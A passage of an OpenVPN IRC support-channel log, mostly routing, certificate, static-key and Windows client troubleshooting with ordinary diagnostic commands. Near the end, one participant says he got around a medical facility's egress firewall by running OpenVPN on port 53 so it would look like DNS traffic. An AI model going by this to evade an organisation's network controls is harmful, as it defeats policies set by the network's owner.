2.3 with --server-ipv6 11:22 <@EugeneKay> Or w/e the option is called 11:27 < jzaw> EugeneKay, and does one specify network by /64 ? cos for ipv4 you use 255.255.x.x 11:27 <@EugeneKay> TBQH I've not used 2.3 yet. 11:27 <@EugeneKay> I would suspect that you hand out from a /64, because that's the minimum IPv6 network size(per the RFCs, anyway) 11:28 < jzaw> for slaac yes 11:28 <@EugeneKay> For any network :-p 11:28 < jzaw> but for the endpoints you dont care 11:28 <@EugeneKay> It works just fine all the way down to a /126, but don't tell anybody that you're actually doing that. 11:28 < jzaw> its only going to use 2 ips or 4 11:29 <@EugeneKay> In any case, give it a go. What's the worst that could happen? ;-) 11:29 < jzaw> the world could cave in and disappear down a hole ? 11:29 < jzaw> :D 11:29 <@EugeneKay> It could be an improvement. 11:30 < jzaw> i cant argue wih that 11:30 * EugeneKay goes back to GF+movie 11:30 < Dave2> Hey. I'm trying to get OpenVPN 2.3 set up such that it it'll not add any routes itself, letting my up script do that for me, but still pass the route_net_gateway variable through to my up script so that I can add the route in a separate table. Is there a way to do this that I've not found? As far as I can tell I can have the variable when it's adding routes for me, but not when I have route-nopull (which makes sense). 11:35 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 11:35 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 11:37 <@dazo> Dave2: check out --route-nopull in the man page 11:38 < Dave2> dazo: route-nopull suppresses $route_net_gateway as far as I can tell, so I can't add the route myself 11:39 <@dazo> Dave2: have you tried --route-noexec + --route-up ? 11:40 * dazo actually confused --route-nopull with --route-noexec in his first comment 11:40 < Dave2> I have route-noexec set at the moment and that stops it from adding 0.0.0.0/1 and 128.0.0.0/1 routes, but it's still adding a route; would --route-up fix that? 11:42 < Dave2> (The route that it's adding isn't a default route, it's just for the subnet the VPN is on, but I still don't want that route) 11:42 <@dazo> Dave2: --route-up is to let your own script set up the routes .... and all pushed routes should then be available via env. variables 11:43 <@dazo> I'd probably just do the opposite ... let pushed routes be set up ... and then add a --route-up script (maybe with a --route-delay) to remove the unwanted route 11:43 <@dazo> at least if it's just one route or so 11:45 < Dave2> I was considering doing that, but I don't think I can see the subnet in an env variable passed to route-up, so it's a little more complex. (Unless there's an easy way to delete all routes relating to $dev, I might look at that.) 11:47 <@dazo> You mean, that push route you don't want isn't static? 11:48 < Dave2> It probably is static per VPN provider, but I'm trying to be generic as this will end up using more than one 11:48 <@dazo> ah, okay 11:48 <@dazo> then I think --route-up + --route-noexec is the solution ... all routes should be sent to the script via env.variables, iirc ... so you need to parse them 11:52 < Dave2> Oh, I see what I'm doing wrong, I'm looking for CIDR and completely skipping past the netmask 11:55 -!- xbanux [~xbanux@triband-mum-59.182.161.92.mtnl.net.in] has quit [Read error: Connection reset by peer] 11:55 -!- xbanux [~xbanux@triband-mum-59.182.139.230.mtnl.net.in] has joined #openvpn 12:03 -!- AsadH is now known as zz_AsadH 12:09 -!- z0ttel [~ident@2a01:4f8:100:7ffe:2::2] has joined #openvpn 12:09 < z0ttel> hi 12:10 -!- md_5 [~md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 12:11 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has quit [Read error: Connection reset by peer] 12:12 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 12:12 < z0ttel> I just switched from TinyCA to easyrsa for my pki management 12:13 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer] 12:13 < z0ttel> And tried to create server certificates that could be used for openvpn clients 12:13 < z0ttel> (nsCertType = server, client) 12:13 < z0ttel> a certificate dump with openssl confirms that setting, but I keep getting an error on connection: http://npaste.de/p/xA/ 12:14 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 12:14 < z0ttel> are there other options I have to set or am I missing something else? 12:17 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 12:19 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 12:19 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 12:23 < z0ttel> I guess I'll give clientAuth a try 12:25 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:27 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 276 seconds] 12:30 < z0ttel> okay - that did it - thank you anyway - ciao :) 12:30 -!- z0ttel [~ident@2a01:4f8:100:7ffe:2::2] has left #openvpn [] 12:33 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:37 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 12:41 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:44 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 12:45 -!- brute11k [~brute@89.249.235.173] has quit [Ping timeout: 245 seconds] 12:46 -!- brute11k [~brute@89.249.235.42] has joined #openvpn 12:47 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 12:52 -!- xbanux [~xbanux@triband-mum-59.182.139.230.mtnl.net.in] has quit [Read error: Connection reset by peer] 12:52 -!- xbanux [~xbanux@triband-mum-59.182.156.145.mtnl.net.in] has joined #openvpn 12:55 -!- JSharpe [~JSharpe@146.185.24.18] has quit [Ping timeout: 245 seconds] 12:56 -!- kls [~kls@198.211.125.123] has joined #openvpn 12:57 < kls> hello 12:58 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:58 -!- kls [~kls@198.211.125.123] has quit [Client Quit] 13:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 13:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:13 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 13:14 -!- tjz [~tjz@unaffiliated/tjz] has quit [Read error: Connection reset by peer] 13:14 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 13:20 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 13:34 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn 13:42 -!- zz_AsadH is now known as AsadH 13:46 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 248 seconds] 13:49 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 258 seconds] 13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:03 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:07 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 14:18 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has joined #openvpn 14:19 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 14:27 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 14:34 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:56 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 15:02 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 15:03 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Quit: ZNC - http://znc.in] 15:09 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 15:09 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Quit: hatschi] 15:12 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:39 -!- erry is now known as errietta 15:40 -!- master_of_master [~master_of@p4FF24801.dip.t-dialin.net] has joined #openvpn 15:44 -!- master_o1_master [~master_of@p4FF24BF8.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 15:48 -!- xbanux [~xbanux@triband-mum-59.182.156.145.mtnl.net.in] has quit [Ping timeout: 264 seconds] 15:49 -!- master_o1_master [~master_of@p4FF24695.dip.t-dialin.net] has joined #openvpn 15:49 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 15:49 -!- dazo is now known as dazo_afk 15:53 -!- master_of_master [~master_of@p4FF24801.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 15:56 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 15:57 -!- Shway [~Shway@216.208.252.66] has left #openvpn [] 16:01 -!- brute11k [~brute@89.249.235.42] has quit [Quit: Leaving.] 16:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 16:04 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 16:18 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:30 -!- mallxs [~mallxs@84.246.31.190] has joined #openvpn 16:34 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:36 < mallxs> Hi i have a up and running a openvpn between a debia and a rhel using a static.key .. on the rhel side it keep complaining: Authenticate/Decrypt packet error: bad packet ID 16:36 < mallxs> any idea where i should start looking ? 16:38 < pekster> mallxs: Verify the key file is the same, you've properly configured the direction option to the --secret parameter, and that your --comp-lzo usage matches exactly on both sides, down to the optional patameter on it 16:38 < mallxs> pekster: thx will go look 16:42 < mallxs> pekster: lzo is not enabled (yet) and in the conf i have only "secret static.key" as opton 16:42 < pekster> You have 2 configs (one at each end.) Tell you what, how about you just pastebin them? 16:42 < pekster> !paste 16:42 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 16:42 < pekster> Oh, and we have some nice grep magic to rip out comments/blanks: 16:42 < pekster> !configs 16:42 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 16:43 < pekster> !learn pastebin as If you're pasting config files, see !configs for grep syntax to remove comments comments 16:43 <@vpnHelper> Joo got it. 16:45 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 16:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:49 < Rienzilha> anyone 16:49 < Rienzilha> whops 16:49 < Rienzilha> disregard that 16:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 16:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:58 < mallxs> pekster: http://pastebin.com/zz6t3sFX 16:59 < mallxs> it now there 17:02 -!- robert_ [~hellspawn@objectx/robert] has joined #openvpn 17:02 < pekster> No ping on the server side, but that doesn't matter if you're not using ping-restart anyway. Should be fine, provided your key matches (did you checksum it to verify it matches?) 17:03 < pekster> Oh, 2.1... I'm not sure what it's default is for comp-lzo actually 17:03 < pekster> That's a rather old version 17:03 < mallxs> Not yet but i i do have a connection and do a ssh to the other machine .. would be bad if the didn't match and it still worked 17:04 < mallxs> s/the/they/ 17:05 < pekster> Right (well, sort of. It doesn't use the entire key file unless you're using the longest keyed cipher in bi-directional mode. You're doing neither 17:05 < mallxs> pekster: the 2.1 i will fix .. move to a newer machine ... ca you point me to a read for the keydection thing ? 17:06 < mallxs> for the key i did opencpn --genkey static 17:06 < mallxs> minus the typo's 17:07 < pekster> See --secret in the manpage. Basically, you just add a 2nd parameter of '0' and '1' to each end (they must be opposite) 17:07 < pekster> It's more secure since it uses 4 keys: one in each direction for HMAC and encryption 17:08 < mallxs> so i go into the static.key file and add the 0 & 1 ? 17:09 < pekster> Hmm, I just checked the 2.1.3 manpage, and 'comp-lzo adaptive' is the default when unspecified. You can try adding a matching directive to each end, but that shoudln't be your issue 17:09 < pekster> No, you add it to the config file 17:09 < pekster> There's an entire section on that in the manpage 17:09 < pekster> Search for the string '--secret' 17:10 -!- errietta is now known as erry 17:12 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds] 17:19 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 17:21 < mallxs> ok thx pekster fixed the secred and now i have a connection in copied the key again . 17:23 < mallxs> but i did not fix the Authenticate/Decrypt packet error: bad packet ID in my syslog mey that be due to firewall 's there are lot of cisco beteen the machines 17:24 -!- AsadH is now known as zz_AsadH 17:24 < mallxs> and a linux firewall-iptables / router 17:24 < pekster> Only if this "firewall" is editing packet data. That's likely not your problem 17:25 < mallxs> ok thx for the help .. i only then have to cleanup my syslog more frequent 17:25 < pekster> I'd still try what I suggest a while back; add an explicit --comp-lzo option with your choice of parameter to both ends such that they match 17:26 < mallxs> yes did that have set them to yes on both sides 17:28 -!- zz_AsadH is now known as AsadH 17:29 < mallxs> o btw pfSense what is that? i followed the link you gave me but there was no install talk or how to get it ? 17:31 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:44 -!- JackWinter1 [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 17:46 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 17:50 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 252 seconds] 17:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 17:54 -!- kubbing [~kubbing@89.177.146.18] has quit [Read error: Operation timed out] 17:57 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 17:58 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 17:58 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 18:01 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 272 seconds] 18:05 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 18:16 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds] 18:28 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 18:39 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 18:46 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving] 18:47 -!- roconnor [~roconnor@69.166.22.226] has joined #openvpn 18:47 < roconnor> !welcome 18:47 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 18:47 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 18:51 < roconnor> !mitm 18:51 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config 18:51 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:59 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 19:00 -!- raidz is now known as raidz_away 19:01 -!- roconnor [~roconnor@69.166.22.226] has quit [Read error: Operation timed out] 19:01 -!- roconnor [~roconnor@e120-pool-d89a65c3.brdbnd.voicenetwork.ca] has joined #openvpn 19:01 -!- AsadH is now known as zz_AsadH 19:03 -!- roconnor [~roconnor@e120-pool-d89a65c3.brdbnd.voicenetwork.ca] has left #openvpn [] 19:05 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 19:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 19:30 -!- njbair [~njbair@user-12l369d.cable.mindspring.com] has joined #openvpn 19:32 < njbair> I've got a working tap client/server config which I am able to launch from the CLI (using sudo, anyway). I've installed the desktop windows client on another machine and loaded the same config. But the client just gets stuck on "connecting..." and the server logs show no connection attempts being made. Any ideas what's wrong? 19:38 < Poster> Is the server running UDP or TCP? 19:39 < njbair> UDP 19:39 < Poster> Does netstat on the server show the expected UDP listener on the correct port? 19:40 < njbair> I haven't checked, but as I said the config works from a Linux box on the command line 19:41 < Poster> well that's a start, try verifying via netstat the UDP listener is where you expect 19:41 < Poster> it sounds like you might have some packet filtering between the client and server 19:42 < njbair> hmm, I don't see it there 19:42 < njbair> server is a DD-WRT router, BTW 19:42 < Poster> ok you might have iptables in play there 19:43 < Poster> when you launch the openvpn daemon from the DD-WRT, are you putting it in the background with the --daemon switch? 19:44 < njbair> not explicitly, not sure what the default is 19:45 < njbair> ok 19:45 < njbair> ps | grep openvpn shows it was launched with --daemon 19:45 < Poster> when you start via sudo, without daemon, it will launch in foreground 19:45 < Poster> ok it typically is when called via init script 19:45 < Poster> do you have lsof? 19:45 < njbair> no 19:45 < Poster> how about netstat -an | grep UDP 19:46 < njbair> you understand that when I talked about launching with sudo, I was talking about a client, right? 19:46 < njbair> there it is, on 1194 19:46 < Poster> ok I took it the client was a windows host 19:46 < njbair> I have two clients 19:47 < njbair> the linux client works via CLI, the windows client hangs on "connecting..."\ 19:47 < Poster> oh, ok, is there some type of firewall on the windows host? 19:47 < njbair> lemme check if Windows Firewall is enabled... 19:48 < Poster> is the working Linux host and the Windows host inside the same subnet? 19:49 < njbair> Yes...in fact, the windows host is a bridged VM inside of the Linux host. 19:49 < njbair> my local router sees them both as unique IPs 19:49 < njbair> I just disabled Windows Firewall and I still can't connect 19:50 < Poster> is the Linux host currently connected? 19:50 < njbair> no 19:52 < Poster> are you referencing the DD-WRT by name or IP address? 19:52 < njbair> name 19:52 < Poster> can you ping it by name? 19:52 < njbair> no but that's because ping is disabled on the router. But I can connect via web/ssh via name 19:53 < Poster> can you load the server configuration on the host Linux system and connect there? 19:53 < njbair> I haven't tried that... 19:53 < Poster> you might also be able to use tcpdump on the Linux host 19:54 < Poster> if your LAN adapter is eth0, something like 19:54 < Poster> sudo tcpdump -i eth0 port 1194 19:55 < njbair> well hey now, this is weird. 19:56 < njbair> I'm not running the server locally yet 19:56 < njbair> but I just invoked tcpdump 19:56 < Poster> I am assuming your virtualization software is bridging your LAN adapter 19:56 < njbair> and I got a bunch of packets from the remote server 19:57 < njbair> yes, it's bridged 19:57 < Poster> remote server being the DD-WRT address? 19:57 < njbair> yes 19:57 < Poster> is the other IP address that of the Windows system? 19:58 < njbair> no, it's the linux host where I ran the tcpdump 19:58 < njbair> but that was it 19:58 < njbair> nothing more since then 19:59 < Poster> ok so can you validate that the openvpn daemon is not running on the Linux host? 19:59 < njbair> yes 19:59 < njbair> nothing in output of ps 19:59 < njbair> tcpdump shows nothing when I try to connect from the windows host 20:00 < Poster> ok try this, from the Windows host 20:00 < Poster> telnet dd-wrt 1194 20:00 < Poster> it will invoke a TCP connection, but should be captured by the tcpdump 20:00 < njbair> hmm, no telnet in win7 apparently 20:00 < njbair> this is home edition 20:01 < njbair> better go get putty 20:01 < Poster> Little rusty on Windows 7, it's optional I think 20:01 < Poster> I don't remember if it's a feature or add/remove programs windows component 20:02 < njbair> putty works 20:02 < Poster> ok so you're seeing the 1194 TCP connection via tcpdump with the correct source address? 20:02 < njbair> windows host sent three packets, then timed out 20:02 < njbair> each about 5secs apart 20:02 < Poster> ok that's probably right 20:03 < Poster> had the S flag in tcpdump 20:03 < njbair> yep 20:03 < Poster> ok just to test can you completely disable the Windows firewall? 20:04 < Poster> if tcpdump is not showing UDP frames originating from the Windows host, it's not likely leaving the Windows host 20:04 < njbair> disabled, still not connecting and nothing in tcpdump 20:04 < njbair> should I see a tap adapter in my network adapters? 20:04 < njbair> because I don't 20:05 < Poster> yep 20:05 < Poster> though I think the tap adapter isn't invoked until the session is established 20:05 < njbair> it should still be there even if it's not being used, i think 20:05 < Poster> when you installed OpenVPN, were you prompted to install the TAP adapter? 20:06 < Poster> I believe it's unsigned so you're asked 20:06 < njbair> yes 20:06 < njbair> but it's not there 20:06 < Poster> might be disabled, try start -> run -> ncpa.cpl 20:06 < njbair> wait there it is 20:07 < Poster> can you temporarily change the server from UDP to TCP? 20:07 < njbair> yeah hang on 20:09 < njbair> no change 20:09 < njbair> linux host works over TCP, though 20:10 < Poster> ok using putty on the windows host, running tcpdump on the Linux host, try using putty and point it to the DD-WRT port 1194 20:10 < Poster> you should see the connection on tcpdump 20:10 < Poster> be sure to update the openvpn configuration on the windows host to use TCP 20:11 < njbair> did that 20:12 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:12 < Poster> ok are you seeing traffic via tcpdump ? 20:12 < njbair> ok, telnet exited cleanly, saw a few packets on the dump 20:13 < Poster> actually, are you starting the OpenVPN daemon on windows 7 as an administrator? 20:13 < njbair> no 20:13 < Poster> give that a shot 20:14 < njbair> no change 20:14 < Poster> ok so using putty, on the windows host, putting it in telnet mode, setting the destination host as the DD-WRT and the port of 1194, you do see the traffic on the Linux host running tcpdump? 20:15 < njbair> yes. 9 packets, back and forth 20:15 < njbair> err 9 lines 20:18 < Poster> ok and when you're doing this in putty, for the host are you using the hostname for the DD-WRT or IP address? 20:18 < njbair> just for kicks, I tried changing it to dev tun, no change. no traffic on tcpdump 20:18 < njbair> hostname, always 20:18 < Poster> I don't think we're getting that far yet 20:19 < Poster> I am fairly sure you have to connect and pass authentication before the daemon tries to bring in the TAP adapter 20:19 < njbair> I'm booting an XP machine to see if that can connect 20:25 < njbair> that's not going to work...I don't have .NET and don't want to install it now 20:27 < Poster> I didn't think it needed .NET framework 20:27 < njbair> the desktop client deos 20:27 < njbair> *does 20:28 < njbair> unless there is another way to connect a windows machine? 20:29 < Poster> I guess I've always had a few flavors, but I never knew of that dependency 20:30 < njbair> What about the package at the bottom of this page: http://openvpn.net/index.php/download.html 20:30 <@vpnHelper> Title: Downloads (at openvpn.net) 20:30 -!- amir [~amir@unaffiliated/amir] has quit [Read error: Operation timed out] 20:31 < Poster> I think you're looking at access server 20:31 < Poster> try http://openvpn.net/index.php/open-source/downloads.html 20:31 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 20:31 <@vpnHelper> Title: Community Downloads (at openvpn.net) 20:31 < njbair> Is it just me, or is there no menu link to the clients? 20:32 < Poster> they're one in the same 20:32 < njbair> well then 20:33 < Poster> the binary can be a server or client, it depends on the configuration you point it to 20:33 < njbair> I see 20:33 < njbair> I think I was using the wrong package 20:34 < Poster> I've never tried the access server, I am guessing it helps with administration or setup 20:34 < njbair> Look here: https://openvpn.net/index.php?option=com_content&id=357 20:34 <@vpnHelper> Title: Client Packages (at openvpn.net) 20:34 < njbair> That's what I've been using 20:35 < Poster> ok yeah I don't know much about those 20:35 < Poster> I've always used the community flavor 20:36 < njbair> I just installed community 20:36 < njbair> OpenVPN GUI is running now, but where do I configure it? 20:36 < Poster> OpenVPN GUI is just a wrapper to start and stop 20:37 < Poster> it reads for *.ovpn in either C:\Program Files\OpenVPN\config or C:\Program Files (x86)\OpenVPN\config 20:37 < njbair> Ok I right-clicked my config file and clicked "Run OpenVPN on this config" 20:37 < Poster> then gives you point and click to connect/disconnect, I think configure a proxy, etc 20:37 < njbair> now I'm connected 20:38 < njbair> ha 20:38 < njbair> what the heck is that other client package 20:38 < njbair> I guess that's why there's no menu item for it 20:39 < Poster> I really have no idea =[ 20:40 < njbair> so where should I store my keys and cert files? 20:40 < Poster> you can keep them anywhere, I usually place them with or near my configuration file 20:41 < Poster> in C:\Program Files\OpenVPN\config or C:\Program Files (x86)\OpenVPN\config 20:41 < Poster> but you can specify a full path in your configuration 20:41 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds] 20:41 < Poster> if you wanted to split them for security reasons 20:41 < Poster> put the config and cert on one drive, then carry the key on a USB disk or something 20:43 < njbair> we've got plenty of secure transmission options. I just wasn't sure if there was a convention for that. 20:43 < njbair> Is there a config option for a friendly name? 20:43 < Poster> friendly name for the VPN connection? 20:43 < njbair> yea 20:44 < Poster> in my experience, it just takes the name of the configuration file 20:44 < Poster> so foo.ovpn would show up as "foo" 20:44 < njbair> ok 20:46 < njbair> wow that is really easy 20:46 < njbair> (once you install the right client software, that is 20:46 < njbair> well hey, I owe you a big thanks for your patience and willingness to help 20:47 < Poster> yeah I like it quite a bit, I use it on Windows/BSD/Linux with great success 20:47 -!- master_of_master [~master_of@p4FF245E4.dip.t-dialin.net] has joined #openvpn 20:47 < njbair> ever play with it on mobile? 20:47 < Poster> I have not, I don't do a lot of mobile outside of email/web/text 20:48 < njbair> as I understand it, Android doesn't work with TAP (it's a root access thing) 20:48 < Poster> yeah I thought it required a rooted phone 20:49 < njbair> You basically need TAP for a windows environment, I would think 20:50 < Poster> yep, you install the adapter 20:50 < Poster> you can install multiple as well, I have remote hosts I manage with 4 adapters running unique connections on each 20:50 < Poster> makes administration a breeze 20:50 < njbair> wow 20:50 -!- master_o1_master [~master_of@p4FF24695.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 20:50 < Poster> most are behind NAT of some type at remote locations 20:51 < Poster> I use the link made to me to go back through to access services, works out real well 20:51 < njbair> do you run any other VPNs? 20:51 < Poster> not personally no 20:51 < njbair> (IPSEC, PPTP) 20:52 < Poster> I did use freeswan awhile back 20:52 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 20:52 < Poster> somewhere along the lines I discovered OpenVPN and have not gone back since 20:52 < njbair> We've been running PPTP for the office because it's so easy to set up. But it's old, buggy, and insecure. 20:52 < Poster> yeah I wouldn't recommend it 20:52 < njbair> I may have to keep it set up for mobile access 20:53 < njbair> just for when our staff are, say, at the airport and need a secure tunnel 20:53 < Poster> OpenVPN can be good for restrictive firewalls too 20:53 < Poster> I was recently in a medical facility that only allowed 53, 80 and 443 out 20:53 < Poster> I was able to leverage an OpenVPN daemon on 53 then tunnel all my traffic through the remote host 20:54 < njbair> how did you get out on 53? 20:54 < Poster> set the OpenVPN client and server to use 53/udp 20:54 < Poster> most firewalls will think it's DNS traffic 20:54 < Poster> unless it's intelligent and actually proxies DNS queries, but most places are not that secure 20:55 < Poster> you can do the same putting it on 80 or 443 20:55 < njbair> what's the difference between using UDP and TCP? 20:55 < Poster> it's the transport that OpenVPN uses 20:56 < Poster> UDP is a bit lighter, does not have TCP overhead 20:56 < njbair> so then faster 20:56 < Poster> but TCP is generally NAT friendly 20:56 < Poster> yep 20:56 < njbair> what about encryption? Should I be concerned about blowfish? I've heard mixed opinions 20:56 < Poster> UDP can have trouble through NAT though, since UDP is stateless, connection tracking is sort of "best effort" where it looks for matching return traffic 20:57 < Poster> I've run into several cases where I am using UDP behind a consumer grade NAT router 20:57 < Poster> and it would lose state and the connection would die 20:57 < Poster> TCP is pretty much immune since it has a handshake and sequencing numbers 20:57 < njbair> right 20:57 < njbair> I guess I'll try UDP and if it's flaky I can change it 20:58 < Poster> yeah it's going to be slightly faster 20:58 < njbair> have you ever benchmarked different ciphers? 20:58 < Poster> not a whole lot 20:58 < Poster> I did bury a 400 MHz system trying to pass VoIP traffic though 20:59 < Poster> that was awhile ago 20:59 < njbair> heh 20:59 -!- nonotza [~nonotza@rrcs-50-74-239-162.nyc.biz.rr.com] has joined #openvpn 21:00 < njbair> wow 21:01 < njbair> I'm getting 15Mbps down through this baby 21:01 < Poster> I've not done anything too heavy 21:01 < Poster> but until I implemented virtualization I ran about a dozen OpenVPN links on a Pentium Pro 200 MHz with 64MB of memory 21:02 < njbair> yeah, it seems really lightweight and fast 21:02 < Poster> now the CPU is much faster, but the memory is the same 21:02 < Poster> I keep the PPro200s around though 21:02 < Poster> they are pretty lean and low power 21:03 < Poster> no fan on the CPU 21:03 < njbair> If OpenVPN can run this fast on an Atheros chip, I'm wondering if it's been ported to ARM for the Raspberry Pi 21:03 < Poster> I would imagine so 21:04 < njbair> Imagine, VPN'ing everywhere you go for $35/ea 21:04 < Poster> it's portability is great 21:04 < Poster> I am not sure about a second ethernet adapter, I have heard that USB on the Pi can be hit or miss 21:04 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 21:05 < njbair> You don't need one 21:05 < Poster> I think I am missing your idea 21:05 < njbair> Just tell the firewall to redirect all port 1194 traffic to the VPN IP 21:05 < Poster> oh, yeah you could do that 21:06 < Poster> if you want to be able to pierce most firewalls you might want to do one UDP listener and 